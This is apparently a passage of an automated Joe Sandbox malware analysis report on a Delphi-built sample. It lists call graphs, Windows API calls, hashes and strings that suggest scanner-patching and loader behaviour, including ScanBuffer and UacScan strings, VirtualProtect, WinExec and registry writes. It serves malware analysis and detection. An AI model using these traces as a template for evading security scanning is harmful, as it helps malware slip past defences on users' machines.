2 call 2997e14 call 29846a4 * 2 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 * 16 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 29846a4 * 2 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 ExitProcess 11574->11709 11710 29a6bb6-29a6bc5 call 2984898 11574->11710 12277 29a681c-29a6a28 call 29849a4 call 299c978 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 EnumSystemLocalesA GetCurrentProcess call 2997cc8 GetCurrentProcess call 2997cc8 GetCurrentProcess call 2997cc8 GetCurrentProcess call 2997cc8 GetCurrentProcess call 2997cc8 GetCurrentProcess call 2997cc8 11575->12277 12278 29a6817-29a681a 11575->12278 11710->11709 11721 29a6bcb-29a6e9e call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 299d270 call 298480c call 298494c call 29846a4 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2987e20 11710->11721 12046 29a717b-29a737c call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 29849a4 call 29981b8 11721->12046 12047 29a6ea4-29a7176 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 299cec8 call 2984500 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 298480c call 298494c call 29846a4 call 2984798 call 298494c call 29846a4 call 2997e14 call 2984d8c * 2 call 2984734 call 299c7b4 11721->12047 12020->12019 12046->11709 12047->12046 12277->11574 12278->12277
                                                                              APIs
                                                                                • Part of subcall function 02997E14: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02997F0D), ref: 02997E4C
                                                                                • Part of subcall function 02997E14: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02997F0D), ref: 02997E5A
                                                                                • Part of subcall function 02997E14: GetProcAddress.KERNEL32(75370000,00000000), ref: 02997E73
                                                                                • Part of subcall function 02997E14: NtFlushInstructionCache.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000,00000000), ref: 02997EE2
                                                                                • Part of subcall function 02997E14: FreeLibrary.KERNEL32(75370000,00000000,00000000,00000000,00000000,029D7364,Function_000065E0,00000004,029D7374,85B025FF,52943FFC,00000040,029D7378,75370000,00000000,00000000), ref: 02997EED
                                                                                • Part of subcall function 0299D3F0: RegOpenKeyA.ADVAPI32(?,00000000,029D7648), ref: 0299D434
                                                                                • Part of subcall function 0299D3F0: RegSetValueExA.ADVAPI32(0000089C,00000000,00000000,00000001,00000000,0000001C,00000000,0299D49F), ref: 0299D46C
                                                                                • Part of subcall function 0299D3F0: RegCloseKey.ADVAPI32(0000089C,0000089C,00000000,00000000,00000001,00000000,0000001C,00000000,0299D49F), ref: 0299D477
                                                                              • WinExec.KERNEL32(00000000,00000000), ref: 029A565A
                                                                                • Part of subcall function 0299A1D4: CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000), ref: 0299A297
                                                                              • RtlMoveMemory.N(00000000,00000004,00000000,?,ScanBuffer,029D7358,029A8D7C,UacScan,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C,OpenSession,029D7358,029A8D7C), ref: 029A5BDC
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AddressCacheCloseCompareExecFlushFreeHandleInstructionLoadMemoryModuleMoveOpenProcStringValue
                                                                              • String ID: C:\Users\Public\$C:\Windows\System32\$Initialize$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
                                                                              • API String ID: 17596641-872072817
                                                                              • Opcode ID: 56b5f27f1e17a53565e0c5800abb19fae545d03df768ed965c6fe6f8723af003
                                                                              • Instruction ID: 8b15d43df0d7c84052d3c0f929c4da8579568d5dfe8c98756b9663b363be7092
                                                                              • Opcode Fuzzy Hash: 56b5f27f1e17a53565e0c5800abb19fae545d03df768ed965c6fe6f8723af003
                                                                              • Instruction Fuzzy Hash: A2921934A5025A8FDB20FBA4CD90EED73B6BFD9310F1454E5E008EB654DA71AE819F44
                                                                              Function 02981724 Relevance: 9.0, APIs: 7, Instructions: 289sleepCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 12963 2981724-2981736 12964 2981968-298196d 12963->12964 12965 298173c-298174c 12963->12965 12968 2981a80-2981a83 12964->12968 12969 2981973-2981984 12964->12969 12966 298174e-298175b 12965->12966 12967 29817a4-29817ad 12965->12967 12970 298175d-298176a 12966->12970 12971 2981774-2981780 12966->12971 12967->12966 12974 29817af-29817bb 12967->12974 12975 2981a89-2981a8b 12968->12975 12976 2981684-29816ad VirtualAlloc 12968->12976 12972 2981938-2981945 12969->12972 12973 2981986-29819a2 12969->12973 12977 298176c-2981770 12970->12977 12978 2981794-29817a1 12970->12978 12980 29817f0-29817f9 12971->12980 12981 2981782-2981790 12971->12981 12972->12973 12979 2981947-298195b Sleep 12972->12979 12982 29819b0-29819bf 12973->12982 12983 29819a4-29819ac 12973->12983 12974->12966 12984 29817bd-29817c9 12974->12984 12985 29816df-29816e5 12976->12985 12986 29816af-29816dc call 2981644 12976->12986 12979->12973 12988 298195d-2981964 Sleep 12979->12988 12993 29817fb-2981808 12980->12993 12994 298182c-2981836 12980->12994 12990 29819d8-29819e0 12982->12990 12991 29819c1-29819d5 12982->12991 12989 2981a0c-2981a22 12983->12989 12984->12966 12992 29817cb-29817de Sleep 12984->12992 12986->12985 12988->12972 12996 2981a3b-2981a47 12989->12996 12997 2981a24-2981a32 12989->12997 13001 29819fc-29819fe call 29815cc 12990->13001 13002 29819e2-29819fa 12990->13002 12991->12989 12992->12966 13000 29817e4-29817eb Sleep 12992->13000 12993->12994 13003 298180a-298181e Sleep 12993->13003 12998 29818a8-29818b4 12994->12998 12999 2981838-2981863 12994->12999 13008 2981a68 12996->13008 13009 2981a49-2981a5c 12996->13009 12997->12996 13005 2981a34 12997->13005 13010 29818dc-29818eb call 29815cc 12998->13010 13011 29818b6-29818c8 12998->13011 13006 298187c-298188a 12999->13006 13007 2981865-2981873 12999->13007 13000->12967 13012 2981a03-2981a0b 13001->13012 13002->13012 13003->12994 13004 2981820-2981827 Sleep 13003->13004 13004->12993 13005->12996 13015 29818f8 13006->13015 13016 298188c-29818a6 call 2981500 13006->13016 13007->13006 13014 2981875 13007->13014 13017 2981a6d-2981a7f 13008->13017 13009->13017 13018 2981a5e-2981a63 call 2981500 13009->13018 13022 29818fd-2981936 13010->13022 13026 29818ed-29818f7 13010->13026 13019 29818ca 13011->13019 13020 29818cc-29818da 13011->13020 13014->13006 13015->13022 13016->13022 13018->13017 13019->13020 13020->13022
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000,?,02982000), ref: 029817D0
                                                                              • Sleep.KERNEL32(0000000A,00000000,?,02982000), ref: 029817E6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: 9c18db5680da34345526d60cdf132b845007d455a62476b3cd15e620acc78148
                                                                              • Instruction ID: 4f2be6a619373ae81a54464a93f294bfc0e577168ff41987f09a5503ad2e5ae9
                                                                              • Opcode Fuzzy Hash: 9c18db5680da34345526d60cdf132b845007d455a62476b3cd15e620acc78148
                                                                              • Instruction Fuzzy Hash: 9BB11072A063518FCB15DF68E8C0366BBE1EB86325F1D86AED44DCB385D7709492CB90
                                                                              Function 02997D4C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45librarymemoryloaderCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,02997DD1,?,?,00000000,00000000), ref: 02997D8D
                                                                              • GetProcAddress.KERNEL32(00000000,kernel32), ref: 02997D93
                                                                              • VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,02997DD1,?,?,00000000,00000000), ref: 02997DAD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AddressHandleModuleProcProtectVirtual
                                                                              • String ID: irtualProtect$kernel32
                                                                              • API String ID: 2099061454-2063912171
                                                                              • Opcode ID: e4d7c4530d7324b4042a30a619a60ffe5edeba095cdf982a0eb3cbde572ed4dc
                                                                              • Instruction ID: 7821ed930f6293ab9f2c57abd5346d9d48aa6cf67b259e0e4e94cf2c6d8c5b4e
                                                                              • Opcode Fuzzy Hash: e4d7c4530d7324b4042a30a619a60ffe5edeba095cdf982a0eb3cbde572ed4dc
                                                                              • Instruction Fuzzy Hash: 1F017CB5644208BFEB01EFECDC41EAEB7EDEF89720F514450B814D7680DA30AE008A24
                                                                              Function 02981A8C Relevance: 7.7, APIs: 6, Instructions: 175sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000,?), ref: 02981B17
                                                                              • Sleep.KERNEL32(0000000A,00000000,?), ref: 02981B31
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: 6029829591449855e7d370d1902a5c108918de7f5f5aa2cf4cb1ae81fa766d95
                                                                              • Instruction ID: 34031eeece404a504b246ba1b4a3598e2f5126b3bf3598a5b1bc00c9188aefa8
                                                                              • Opcode Fuzzy Hash: 6029829591449855e7d370d1902a5c108918de7f5f5aa2cf4cb1ae81fa766d95
                                                                              • Instruction Fuzzy Hash: 0E51C2716052408FD715EF7CD984766BBE8AF86314F1C85AED44CCB286E770D886CBA1
                                                                              Function 0299D026 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 112networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0299D166
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CheckConnectionInternet
                                                                              • String ID: Initialize$OpenSession$ScanBuffer
                                                                              • API String ID: 3847983778-3852638603
                                                                              • Opcode ID: 614d18f67732b4861a1d60b13a15e6cbfc55e1e40ed90de8c554d592cf890545
                                                                              • Instruction ID: 9cd7704ace4ef35a780880d1a5a7d2b9242089232488f085bf2b3328cb6b4f8d
                                                                              • Opcode Fuzzy Hash: 614d18f67732b4861a1d60b13a15e6cbfc55e1e40ed90de8c554d592cf890545
                                                                              • Instruction Fuzzy Hash: 2641DC31B502099FEF14FBE8C981E9EB3FAAFC9720F655426E441E7250DA75AD018F60
                                                                              Function 02995BBC Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02995D04,?,?,02993890,00000001), ref: 02995C18
                                                                              • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02995D04,?,?,02993890,00000001), ref: 02995C46
                                                                                • Part of subcall function 02987D20: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02993890,02995C86,00000000,02995D04,?,?,02993890), ref: 02987D6E
                                                                                • Part of subcall function 02987F28: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02993890,02995CA1,00000000,02995D04,?,?,02993890,00000001), ref: 02987F47
                                                                              • GetLastError.KERNEL32(00000000,02995D04,?,?,02993890,00000001), ref: 02995CAB
                                                                                • Part of subcall function 0298A708: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,0298C369,00000000,0298C3C3), ref: 0298A727
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                              • String ID:
                                                                              • API String ID: 503785936-0
                                                                              • Opcode ID: b59d34114c4a5885348a5562376ecd49d973512a49dece3785f4deacc62a5850
                                                                              • Instruction ID: cb74d9151821af1824da8e3622d112726d7b0fc73448503b8dfd676bbdbbcfa4
                                                                              • Opcode Fuzzy Hash: b59d34114c4a5885348a5562376ecd49d973512a49dece3785f4deacc62a5850
                                                                              • Instruction Fuzzy Hash: 6831A330A042059FDB01FFA8C8807AEB7F6AF89714F958465D504EB380E7755D04CFA5
                                                                              Function 0299D3EE Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegOpenKeyA.ADVAPI32(?,00000000,029D7648), ref: 0299D434
                                                                              • RegSetValueExA.ADVAPI32(0000089C,00000000,00000000,00000001,00000000,0000001C,00000000,0299D49F), ref: 0299D46C
                                                                              • RegCloseKey.ADVAPI32(0000089C,0000089C,00000000,00000000,00000001,00000000,0000001C,00000000,0299D49F), ref: 0299D477
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseOpenValue
                                                                              • String ID:
                                                                              • API String ID: 779948276-0
                                                                              • Opcode ID: cb96826fc55f6da032dcc4dfd118426a2d47a025da623bf7b0e2f2ee7d491026
                                                                              • Instruction ID: 0eed5f346fd1cce9cf764e66903d331ea63ef153b3a51503cdd5d3fe7cae2dc4
                                                                              • Opcode Fuzzy Hash: cb96826fc55f6da032dcc4dfd118426a2d47a025da623bf7b0e2f2ee7d491026
                                                                              • Instruction Fuzzy Hash: 3B116D70604205AFEB10FBA8CC81DAE77EDEF89714F845021F504D7290E631ED409F51
                                                                              Function 0299D3F0 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegOpenKeyA.ADVAPI32(?,00000000,029D7648), ref: 0299D434
                                                                              • RegSetValueExA.ADVAPI32(0000089C,00000000,00000000,00000001,00000000,0000001C,00000000,0299D49F), ref: 0299D46C
                                                                              • RegCloseKey.ADVAPI32(0000089C,0000089C,00000000,00000000,00000001,00000000,0000001C,00000000,0299D49F), ref: 0299D477
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseOpenValue
                                                                              • String ID:
                                                                              • API String ID: 779948276-0
                                                                              • Opcode ID: 8efa11a28cdd145c73fca9018a6003736c76a77056226b0f06eb446bfcb40ec6
                                                                              • Instruction ID: cc3d4871cf924d90c6b6c3499eee5ac9c181b189f9de8f3ff096d9eac7135ece
                                                                              • Opcode Fuzzy Hash: 8efa11a28cdd145c73fca9018a6003736c76a77056226b0f06eb446bfcb40ec6
                                                                              • Instruction Fuzzy Hash: B7116D70604205AFEB10FBA8CC81DAE77EDEF89714F845021F504D7290E631E9409F51
                                                                              Function 0298E2F4 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ClearVariant
                                                                              • String ID:
                                                                              • API String ID: 1473721057-0
                                                                              • Opcode ID: 6cafc799dc27c6f0afa2dbe4f19224f7ed59cb77a1b683861de74786bf111e4f
                                                                              • Instruction ID: 8d9df720bb580aec71158b07fa84713fb95c9378fa3d7c0a80f885b3d5b3a1bf
                                                                              • Opcode Fuzzy Hash: 6cafc799dc27c6f0afa2dbe4f19224f7ed59cb77a1b683861de74786bf111e4f
                                                                              • Instruction Fuzzy Hash: B4F0C220708610E7CB287B388DE4A7D329A6F8071175C5837B4C79B165DB348C45DB72
                                                                              Function 02984CFC Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SysFreeString.OLEAUT32(0299D680), ref: 02984C1A
                                                                              • SysAllocStringLen.OLEAUT32(?,?), ref: 02984D07
                                                                              • SysFreeString.OLEAUT32(00000000), ref: 02984D19
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: String$Free$Alloc
                                                                              • String ID:
                                                                              • API String ID: 986138563-0
                                                                              • Opcode ID: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
                                                                              • Instruction ID: f20bc6507b5635872a751084f5a64943df6217c52f0b5e6b865afa7ee0002ca3
                                                                              • Opcode Fuzzy Hash: 5a5438c59bf50d5a9d2d1f0a3350fd82e771d5cb0ff699e6fe957ce0256f5644
                                                                              • Instruction Fuzzy Hash: 14E012B81052025EFB143F219C40B7B376EAFC1751F1C5899A904CA150E734C842AE35
                                                                              Function 0299706C Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SysFreeString.OLEAUT32(?), ref: 0299736A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeString
                                                                              • String ID: H
                                                                              • API String ID: 3341692771-2852464175
                                                                              • Opcode ID: 4e0bdf45087dab059f2b43c07530d6ccf453655273aaf018fb19cf4029e4e1cc
                                                                              • Instruction ID: 3f5341a6ed36ff1074fbc38cb124456b43af6787cfeb9156da88df2317e6e47c
                                                                              • Opcode Fuzzy Hash: 4e0bdf45087dab059f2b43c07530d6ccf453655273aaf018fb19cf4029e4e1cc
                                                                              • Instruction Fuzzy Hash: 15B1D2B4A116089FDB14CF99E480ADDFBF6FF89324F158569E805AB360DB31A845CF50
                                                                              Function 0298E6F0 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VariantCopy.OLEAUT32(00000000,00000000), ref: 0298E711
                                                                                • Part of subcall function 0298E2F4: VariantClear.OLEAUT32(?), ref: 0298E303
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Variant$ClearCopy
                                                                              • String ID:
                                                                              • API String ID: 274517740-0
                                                                              • Opcode ID: d4a06811f5c83fe51b291c3d982e1e1491eb83a3dc3d4756e85ab29040a22950
                                                                              • Instruction ID: 98f56042a955eab6be000c99db4f4db427733a47dd7a170d703c492eb5985e4b
                                                                              • Opcode Fuzzy Hash: d4a06811f5c83fe51b291c3d982e1e1491eb83a3dc3d4756e85ab29040a22950
                                                                              • Instruction Fuzzy Hash: 5B118E2070021097CB34BF79C8E4A6A6BDAAF85710B1C4866F68E9B255EB34CC41CA62
                                                                              Function 0298E38C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InitVariant
                                                                              • String ID:
                                                                              • API String ID: 1927566239-0
                                                                              • Opcode ID: ce3faeb2d05742fd514b7fcaa92a58d7e596463218f44db388b90a4143bb1de8
                                                                              • Instruction ID: 549a0124de2967c0534303d617c7a67ab85a9e62fa892cfaa577cd39866c8389
                                                                              • Opcode Fuzzy Hash: ce3faeb2d05742fd514b7fcaa92a58d7e596463218f44db388b90a4143bb1de8
                                                                              • Instruction Fuzzy Hash: 37314F71A04218ABDB50FFA8D898AAA77ACEB4D314F584861F94DD3280D334ED50CB61
                                                                              Function 029DF14D Relevance: 1.5, APIs: 1, Instructions: 47libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(0000C087,?,?,?,00000000,029DF0C7,?,?,?,?,?), ref: 029DF160
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.00000000029DF000.00000040.00001000.00020000.00000000.sdmp, Offset: 029DF000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_29df000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              • Opcode ID: 4de58a5fadcc9b5f57351689ab0bdeeaf374be54e4febec57efd0a0d01bbac60
                                                                              • Instruction ID: 77f7a43f0b6522e2cab20e09586fbfba9088ee1d5d6631c6b6d775dc6b9bfccc
                                                                              • Opcode Fuzzy Hash: 4de58a5fadcc9b5f57351689ab0bdeeaf374be54e4febec57efd0a0d01bbac60
                                                                              • Instruction Fuzzy Hash: 32F0A476604317DBEB108E55CC5667773ECEE9136970A8828E847EBA01E725E805E7A0
                                                                              Function 02996CFC Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CLSIDFromProgID.OLE32(00000000,?,00000000,02996D49,?,?,?,00000000), ref: 02996D29
                                                                                • Part of subcall function 02984C0C: SysFreeString.OLEAUT32(0299D680), ref: 02984C1A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1338265139.0000000002980000.00000040.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_2980000_#U8f6e#U6905-#U89c4#U683c2024#U5e747#U67081.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeFromProgString
                                                                              • String ID:
                                                                              • API String ID: 4225568880-0
                                                                              • Opcode ID: 7e1318ad9472b452fabf68c7696f137e8d27243566130fb120f19fa6e0c4db50
                                                                              • Instruction ID: 77e2b6c0e40fdaef9c7da33b63faf6afa5d817e19ffcc2382ea382ff8f7dd928
                                                                              • Opcode Fuzzy Hash: 7e1318ad9472b452fabf68c7696f137e8d27243566130fb120f19fa6e0c4db50
                                                                              • Instruction Fuzzy Hash: BFE06D35604308BBEB15FAAACC5199A7BEDDFCAB20B514471A900D3650EA75AE0098A0
                                                                              Function 02985814 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(02980000,?,00000105), ref: 02985832
                                                                                • Part of subcall function 02985A78: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02980000,029AB790), ref: 02985A94
                                                                                • Part of subcall function 02985A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02980000,029AB790), ref: 02985AB2
                                                                                • Part of subcall function 02985A78: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02980000,029AB790), ref: 02985AD0
                                                                                • Part of subcall function 02985A78: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02985AEE
